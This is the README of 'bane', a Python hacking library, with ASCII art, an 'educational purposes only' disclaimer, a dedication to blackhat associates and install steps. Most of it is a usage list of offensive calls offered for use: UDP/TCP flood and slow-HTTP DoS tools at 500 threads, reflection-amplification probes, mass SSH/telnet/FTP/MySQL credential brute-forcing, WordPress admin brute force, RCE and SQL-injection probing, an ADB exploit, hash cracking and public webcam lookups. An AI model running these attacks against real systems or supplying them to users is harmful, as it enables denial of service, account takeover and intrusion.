"Oh, you think darkness is your ally. But you merely adopted the dark; I was born in it, molded by it. I didn't see the light until I was already a man, by then it was nothing to me but BLINDING! The shadows betray you, because they belong to me!" -Bane (Dark Knight)
.///` `.--::::::---.`` `///.
h-.-s+++/--<br>.---/+o++s:.-h
++..-. `:../s
-+ydm-..: :..-dmho:`
:odmNNNNs..-. `:..+MNNNmmy/. `
.odmNNNNMMMN`..: -..`mMMMMNNNNmy:
+mNNNNMMMMMMMo`.:` :``/MMMMMMMMNNNmy.
.yNNNNMMMMMMMMMd` `-<br>```````..-` `yMMMMMMMMMMNNNd:
-dNNNMMMMMMMMMMMN` ..-` `-`- mMMMMMMMMMMMMNNmo
:mNNNMMMMMMMMMMMMM: . `.` -MMMMMMMMMMMMMMNNNs`
/mNNNMMMMMMMMMMMMMMy --- .-- oMMMMMMMMMMMMMMMNNNy`
:mNNNMMMMMMMMMMMMMMMN```:.````````.:```dMMMMMMMMMMMMMMMMNNNy`
-mNNNNMMMMMMMMMMMMMMMMo`.-` `-.`+MMMMMMMMMMMMMMMMMNNNNo
hNNNNNMMMMMMMMMMMMMMMMm.``- .``.dMMMMMMMMMMMMMMMMMMNNNm-
-NNNNNMMMMMMMMMMMMMMMMMM-..: -<br>NMMMMMMMMMMMMMMMMMMNNNNs
oNNNNNMMMMMMMMMMMMMMMMMMo``.` -` +MMMMMMMMMMMMMMMMMMMNNNNm
:dNNNNNNMMMMMMMMMMMMMMMMMd<br>-``````<br>.hMMMMMMMMMMMMMMMMMMMNNNNNs.
.ssmNNNNNNMMMMMMMMMMMMMMMMMM.``/:. .-/```NMMMMMMMMMMMMMMMMMMNNNNNNyy+` `
`oy: mNNNNNNMMMMMMMMMMMMMMMMMM/``-` `-``:MMMMMMMMMMMMMMMMMMMNNNNNN/`+y: `
+y` dNNNNNNMMMMMMMMMMMMMMMMMMy..-:- --:..oMMMMMMMMMMMMMMMMMMMNNNNNN: -N`
m- hNNNNNNMMMNdhhyyhddmMMMMMd```:.``.:```hMMMMNdhso++++shmNMMMNNNNN: yo `
/d yNNNNNMMh/-````````.-/ydNM.``- -```NNds:.`..-----..-sNMMNNNNN- -m`
h+ sNNNNNMMmsyhddmmmdhs:` `-o/../` `/-.:+-` `:yhddmNNNNmmNMMMNNNNN. d/
m/ oNNNNNMMMMMMMNdyssoooo:` `:..``.+```.-. :o++//+yydMMMMMMMMNNNNN` .so
d-- /NNNNNNMMMMMmyhm// ymy.`- o `- odm:- .ddssNMMMMMNNNNNm /:s
.h / :NNNNNNNMMMmhshhy+++ohy/. .: `o` `/``-shysssyddddNMMMMNNNNNNd --.h
-y `: .NNNNNNNMMMMMMMMNNmmmhys/:.`..``.``..`-:syhhdmNNMMMMMMMMMMNNNNNy / `d
:s :` dNNNNNMMMMMMMMMNNNmmNNh- `.` `.` `+mMNNNNNMMMMMMMMMMNNNNN+ :` m `
/o /` oNNNNMMMMMMMMMMMMMMmd+.. `.:- -` - -:.. -sddmNMMMMMMMMMMMMNNNm. .: m `
++ `:``dNNNMMMMMMMMMMMNo+/.`./-. o` --` o `-/.``/+omMMMMMMMMMMNNNo .: d` `
-h `:`:mNNMMMMMMMMMMd-.+.+--:.`.+.-.::.-./-`.:--/:+..hMMMMMMMMMNNh`.: -h `
s: `:`+mNMMMMMMMMMm- `/:` o/://++:++++:+/+/:/o``:+` .mMMMMMMMMNd..: y-
.h `:`/hNMMMMMMd+: -::<br>s-:+`.+:+-.+:+:`/:-+:-.-:- :NMMMMMMNy.-- :y
o/ ` `:``:ymMNh:`- /:-+`o::/` +:/. +:+` /::o./--+ /omMNdo- -- ` h.
`d` `+.` :.` -s: -` ./:::`/::/ +-/. +-+` :::/`-:::- `-`++.``-. `-+ :s
o+ /`-:``.-. `- /--/ /:-: +-/. +-+ :-:+ /--/ .. `--. .:..: h.
`d` :` +h+. - `+-:: .+-:+..-+://-+:+-../:-+-`-:-/. -` -yd. / /s
o+ `:. -ydo. -` //::..o/-:o:.//:/++/:/+.:+/-/+: /::o : :yd+``-- d.
`d .:. -sy .. .o--+ -.+-.`.-/<br>:/<br>/--`.-+.: +--o- `/d+``--`:s
s/ .:` :.:```-o--o.-.:-` `:/ .: /:` `-/ / s:-o-```+``.-` h.
.h -:`/.///`/..`:-.:`<br> <br><br><br>. <br>`: /--../ //:o.:.-y
s: -o/::/:--.-.-.: : /`:.---/::+. y-
`h. ``/. `/ ` -.:``` <br><br>..` ```: / ` :` ./. +o
.y. -.-- -.:.``- -```::```: ..`./ : .-.-` /s
.y- -.:```: :/::o+/::/ : ``: : `+o
`s+` -..- -.o/:/: `+::+//:+. -/::o`: ..`-` .s/
:s- ./- `- -.o//o. /:::-::+ `o//o : -` ./.`+o.
`/o:+..+`.` -.://+<br>+--//:-+<br>////`: `../-.ss-
/h /` ..-` .-o/+:..+--//:-+..-o/+:.` `-.- `+ y-
o+``.-+-.::<br>o//o- /--::--+ .o//s<br>:/.-//:``:s
-o:```.//: :+::+.o--oo:-o.+::+/ :/o.```:o:
-o++oy.: .- /`o::oo:-+-/ -- /o++++o:
`os .. /..//../ ..` `s:
`o+. `:`:-.-. `.++-
`/+/.` `. .` `-++:`
`:+++/:-<br>-:+++/-
`.-::--`
`
INTRODUCTION:
This python library is made for educational purposes only. Me, as the creator and developer, not responsible for any misuse for this module in any malicious activity. It is made as a tool to understand how hackers can create their tools and perform their attacks. It contains most of known attacks and exploits. it can be used to perform: DoS and DDoS attacks (all known tools are included), information gathering, scrapping proxies, crawling, google dorking, checking for vulnerabilities (sql injection (all types), xss, command execution, php code injection, FI, forced browsing
) and even more ;)
The module can be used as a "codebase" for more sophisticated and advanced scanning tools to help securing websites !! I hope you guys use it wisely and carefully ;)
SPECIAL SPEECH:
This is dedicated to my mentor: Zachary Barker ( https://www.facebook.com/zachary.barker.5439 ), he was my leader and teacher through my journey in and advantures in this crazy underground world, we have been through a lot together and were close but now he is dead in a hit-and-run :( . he was one of my true cyber bros:
-S0u1 ( https://twitter.com/YourAnonS0u1 ) : programmer and blackhat.
-Vince ( https://www.facebook.com/vincelinux ) : Linux and hardware expert, social engeneering and programmer.
-Zachary Barker (lulz zombie) : teams leader, anarkist, ops organizer, progammer, cyber security expert and blackhat.
-Lulztigre (https://www.twitter.com/lulztigre) : Bug Bounty Hunter, Penetration Tester And Python Programmer.
-Jen Hill.
in the honor of all my people and the memory of my brother zach im sharing all my personal hacking tools with public. plz use them wisely :)
now let's start some tutorials, shall we?
TUTORIALS:
if you are using windows , please, first download and install "npcap" from here and restart your computer after that. then install bane.
also, if you are using "jython" , please go to the location of the jython "site-packages" example: "C:\jython\Lib\site-packages" , open "dns" folder, open the file "resolver.py" and comment the line "1149" : socket.SOCK_DGRAM: [socket.SOL_UDP], by putting "#" in front of it.
you can use pip to install bane ( if you are on linux you must run it with "sudo" ) :
pip install bane
pip3 install bane
or you can clone the project's link then run setup.py
git clone https://github.com/AlaBouali/bane
cd bane
python setup.py install
To use it, you have to open the python interpreter from your terminal/cmd (bane can be used only inside the interpreter only after importing it):
python
python3
import bane
II-Usage (General usage or read the wiki ):
bane.xss(link , payload="<script>alert(123)</script>" , timeout=15 )
bane.ssti(link , timeout=15 )
bane.rce(link ,injection={"command":"linux"},based_on='time', timeout=15 )
bane.rce(link ,injection={"command":"linux"},based_on='file', timeout=15 )
bane.rce(link ,injection={"command":"windows"},based_on='time', timeout=15 )
bane.rce(link ,injection={"command":"windows"},based_on='file', timeout=15 )
bane.rce(link ,injection={"code":"php"},based_on='time', timeout=15 )
bane.rce(link ,injection={"code":"php"},based_on='file', timeout=15 )
bane.rce(link ,injection={"code":"python"},based_on='time', timeout=15 )
bane.rce(link ,injection={"code":"python"},based_on='file', timeout=15 )
bane.rce(link ,injection={"code":"perl"},based_on='time', timeout=15 )
bane.rce(link ,injection={"code":"perl"},based_on='file', timeout=15 )
bane.rce(link ,injection={"code":"ruby"},based_on='time', timeout=15 )
bane.rce(link ,injection={"code":"ruby"},based_on='file', timeout=15 )
bane.rce(link ,injection={"code":"nodejs"},based_on='time', timeout=15 )
bane.rce(link ,injection={"code":"nodejs"},based_on='file', timeout=15 )
bane.rce(link ,injection={"sql":"mysql"}, timeout=15 )#test for MySQL
bane.rce(link ,injection={"sql":"oracle"}, timeout=15 )#test for Oracle
bane.rce(link ,injection={"sql":"postgre"}, timeout=15 )#test for Postgre
bane.rce(link ,injection={"sql":"sql_server"}, timeout=15 )#test for SQL Server
bane.path_traversal(link, timeout=15 )
bane.ssrf(link )
bane.crlf_header_injection(link, timeout=15 )
bane.crlf_body_injection(link, timeout=15 )
bane.page_clickjacking(link, timeout=15 )
bane.cors_misconfigurations(link, timeout=15 )
cookie="session=fgyujikop"#just an example of cookie sinceit requires a session
bane.csrf(link, timeout=15 , cookie=cookie )
bane.file_upload(link, timeout=15 )
bane.adb_exploit(IP , timeout=5 )
bane.exposed_telnet(IP , timeout=5 )
bane.exposed_env(link , timeout=15 )
bane.exposed_git(link , timeout=15 )
bane.interceptable_links(link , timeout=15 )
bane.springboot_actuator(link , timeout=15 )
bane.vulners_search("wordpress",version="4.7.4")#just an example
bane.phpunit_exploit(link , timeout=15 )
api_key="ghbjklmjklmjlkml...."
bane.shodan_report(IP , api_key)
bane.udp_flood(IP, p= port , min_size=10, max_size=20 , duration= 300 , interval=0.001)
bane.tcp_flood(IP, p= port , min_size=10, max_size=20 , duration= 300 , interval=0.001 , threads=500, timeout=5)
bane.http_spam(IP, p= port , duration= 300 ,interval=0.001 , threads=500 , timeout=5)
bane.prox_http_spam(IP, p= port , duration= 300 ,interval=0.001 , threads=500 , timeout=5)
bane.torshammer(IP, p= port , duration= 300 ,set_tor=False , threads=500 , timeout=5)
bane.prox_hammer(IP, p= port , duration= 300 , threads=500 , timeout=5)
bane.rudy(IP, p= port , duration= 300 ,set_tor=False , threads=500 , timeout=5 , form="q" , page="/search.php")
bane.xerxes(IP, p= port , duration= 300 ,set_tor=False , threads=500 , timeout=5 )
bane.prox_xerxes(IP, p= port , duration= 300 , threads=500 , timeout=5 )
bane.slow_read(IP, p= port , duration= 300 , set_tor=False , threads=500 , timeout=5 )
bane.scan_backend_technology(link , timeout=15 )
bane.get_wp_infos(link , timeout=15 )
bane.get_drupal_infos(link , timeout=15 )
bane.get_joomla_infos(link , timeout=15 )
bane.get_magento_infos(link , timeout=15 )
bane.wp_users(link , timeout=15 )
bane.wp_user(link , user=1 , timeout=15 )
bane.wp_xmlrpc_methods(link , timeout=15 )
bane.wp_xmlrpc_bruteforce(link , timeout=15 )
bane.wp_xmlrpc_mass_bruteforce(link , timeout=15 )
bane.wpadmin(link , username , password , timeout=15 )
bane.wpadmin_mass(link , word_list=["admin:123","admin:HGJJK","admin:HJKL","admin:%MLK"] , timeout=15 )
bane.wp_xmlrpc_pingback(link , timeout=15 )
bane.wp_xmlrpc_pingback(link , target_url="https://www.example.com" , timeout=15 )
bane.wp_xmlrpc_bruteforce(link , timeout=15 )
bane.wp_users_enumeration(link , timeout=15 )
bane.wp_version(link , timeout=15 )
bane.proxyscrape()
bane.proxyscrape(protocol="socks4")
bane.proxyscrape(protocol="socks5")
bane.proxy_check(IP , port , proto="http" , timeout=5)
bane.mass_scan(threads=100 , protocol="ssh" , word_list= ["root:root","admin:admin"] )
bane.mass_scan(threads=100 , protocol="telnet" , word_list= ["root:root","admin:admin"] )
bane.mass_scan(threads=100 , protocol="ftp" , word_list= ["root:root","admin:admin"] )
bane.mass_scan(threads=100 , protocol="mysql" , word_list= ["root:root","admin:admin"] )
bane.mass_scan(threads=100 , protocol="adb" )
bane.forms_parser(link , timeout=10 )
bane.inputs(link , value=True , timeout=10 )
bane.forms(link , value=True , timeout=10 )
bane.loginform(link , value=True , timeout=10 )
bane.crawl(link , timeout=10 )
bane.pather(link , timeout=10 )
bane.media(link , timeout=10 )
bane.subdomains_extract(link , timeout=10 )
bane.get_banner(IP , p=port , payload=None , timeout=5 )
bane.info(IP , timeout=15 )
bane.norton_rate(link , timeout=15 )
bane.myip()
bane.whois( domain )
bane.geoip( IP )
bane.headers( link )
bane.reverse_ip_lookup( IP )
bane.resolve( domain , server="8.8.8.8" )
bane.port_scan( IP , ports=[21,22,23,25,43,53,80,443,2082,3306] , timeout=5 ).result
bane.get_subdomains( domain )
bane.examine_js_code( url )
bane.xor_string( data, key )
bane.caesar_string( data, key )
bane.md5_string( data )
bane.sha1_string( data )
bane.sha224_string( data )
bane.sha256_string( data )
bane.sha384_string( data )
bane.sha512_string( data )
bane.base64_encode( data )
bane.base64_decode( data )
bane.xor_file( file , key )
bane.md5_file( file )
bane.sha1_file( file )
bane.sha224_file( file )
bane.sha256_file( file )
bane.sha384_file( file )
bane.sha512_file( file )
bane.base64_encode_file( file )
bane.base64_decode_file( file )
bane.decrypt(hash , word_list=["admin","admin123","love"] , md5_hash=True )
bane.decrypt(hash , word_list=["admin","admin123","love"] , sha1_hash=True )
bane.decrypt(hash , word_list=["admin","admin123","love"] , sha224_hash=True )
bane.decrypt(hash , word_list=["admin","admin123","love"] , sha256_hash=True )
bane.decrypt(hash , word_list=["admin","admin123","love"] , sha384_hash=True )
bane.decrypt(hash , word_list=["admin","admin123","love"] , sha512_hash=True )
bane.decrypt(hash , word_list=["admin","admin123","love"] , base64_string=True )
bane.decrypt(hash , word_list=["admin","admin123","love"] , caesar_hash=True )
bane.web_login_bruteforce(link , word_list=["admin:admin","admin:1234"] , timeout=15 )
bane.http_auth_bruteforce(link , word_list=["admin:admin","admin:1234"] , timeout=15 )
bane.hydra(IP , protocol="ftp" , word_list=["admin:admin","admin:1234"] , timeout=5 )
bane.hydra(IP , p=22 , protocol="ssh" , word_list=["admin:admin","admin:1234"] , timeout=5 )
bane.hydra(IP , p=23 , protocol="telnet" , word_list=["admin:admin","admin:1234"] , timeout=5 )
bane.hydra(IP , p=25 , protocol="smtp" , ehlo=False , helo=True , ttls=False , word_list=["admin:admin","admin:1234"] , timeout=5)
bane.hydra(IP , p=3306 , protocol="mysqlt" , word_list=["admin:admin","admin:1234"] , timeout=5 )
bane.hydra(link , protocol="wp" , word_list=["admin:admin","admin:1234"] , timeout=15 )
bane.admin_panel_finder(link , ext="php" , timeout=15 )
bane.force_browsing(link , ext="php" , timeout=15 )
bane.filemanager_finder(link , ext="php" , timeout=15 )
bane.dns_factor( IP , timeout=3 )
bane.ntp_factor( IP , timeout=3 )
bane.memcache_factor( IP , timeout=3 )
bane.chargen_factor( IP , timeout=3 )
bane.ssdp_factor( IP , timeout=3 )
bane.snmp_factor( IP , timeout=3 )
bane.echo_factor( IP , timeout=3 )
bane.tor_switch_no_password( interval=30 , logs=True )
bane.tor_switch_with_password( interval=30 , password=password , p=9051 , logs=True)
bane.update(version=None)
bane.clear_file( file )
bane.create_file( file )
bane.delete_file( file )
bane.read_file( file )
bane.get_cf_cookie( domain , user_agent )
bane.HTB_invitation()
bane.facebook_id( fb_link )
bane.google_dorking( dork )
bane.webhint_report( link )
bane.youtube_search( query )
bane.write_file( data , file )
bane.webcams( count=10 , by={'country':'us'} )
bane.webcams( count=10 , by={'type':'axis'} )
bane.webcams( count=10 , by={'city':'paris'} )
bane.webcams( count=10 , by={'timezone':'+00:00'} )